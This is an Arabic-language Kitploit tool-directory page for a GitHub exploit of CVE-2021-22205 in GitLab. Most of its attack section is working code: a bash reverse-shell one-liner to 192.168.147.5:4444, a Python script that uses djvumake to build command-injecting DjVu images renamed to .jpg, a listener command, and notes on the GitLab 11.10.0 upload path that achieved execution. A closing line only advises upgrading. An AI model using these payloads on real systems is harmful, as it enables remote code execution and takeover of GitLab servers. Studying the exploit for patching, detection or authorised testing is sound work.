Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-22205-getshell — CVE-2021-22205-getshell | Kitploit
أدوات/GitHubGitHub/shang159/cve-2021-22205-getshell
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubshang159/cve-2021-22205-getshell

CVE-2021-22205-getshell

CVE-2021-22205-getshell

عرض المستودع
31منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-22205-getshell

CVE-2021-22205-getshell

إصدار الاختبار

بناء أمر لإنشاء استغلال الثغرة

root@kitploit:~
echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh
chmod +x /tmp/1.sh
/bin/bash /tmp/1.sh

استغلال djvumake لإنشاء صورة الاستغلال

root@kitploit:~
import os
payloads=[
    "echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh",
    "chmod +x /tmp/1.sh",
    "/bin/bash /tmp/1.sh",
]
index=1000
for payload in payloads:
    rce_payload = '(metadata\n\t(Copyright "\\\n" . qx{{{0}}} . \\\n" b ") )\n'.format(payload).encode()
    with open("rce-{0}.txt".format(index), "wb") as text_file:
        text_file.write(rce_payload)
    text_file.close()
    os.system("./djvumake rce-{0}.djvu INFO=0,0 BGjp=/dev/null ANTa=rce-{1}.txt && mv rce-{2}.djvu rce-{3}.jpg".format(index,index,index,index))
    index=index+1
تنزيل الأداة

الاستماع محليًا على المنفذ 4444 لانتظار الصدفة العكسية

root@kitploit:~
nv -lv 192.168.147.5 4444

رفع الصور إلى GitLab بشكل منفصل

  • هذا هو المكان الذي يختلف عن الاستغلالات المتداولة على الإنترنت، فمعظم استغلالات الثغرات تستخدم GitLab بإصدار عالي (12 أو 13) ونقطة الرفع هي إنشاء مقتطفات جديدة (Snippets)، المسار: /uploads/user
  • الإصدار الذي قمت بالتحقق منه هو 11.10.0، استخدام مسار الرفع العام /uploads/user أدى إلى خطأ 404، واستخدام مسار رفع المقتطفات /uploads/personal_snippet لم يستطع تنفيذ الأمر
  • في النهاية، تم رفع الصورة من صفحة إنشاء مشكلة (Issue) ونجح تنفيذ الأمر

نجح الحصول على صدفة عكسية والوصول إلى الجهاز المستهدف

بعد رفع الصور الثلاث بشكل منفصل، الصورة الثالثة تنفذ أمر الصدفة العكسية وتم الحصول على صلاحيات الجهاز المستهدف بنجاح

توصيات الإصلاح

قم بترقية GitLab إلى أحدث إصدار أمني في أقرب وقت ممكن.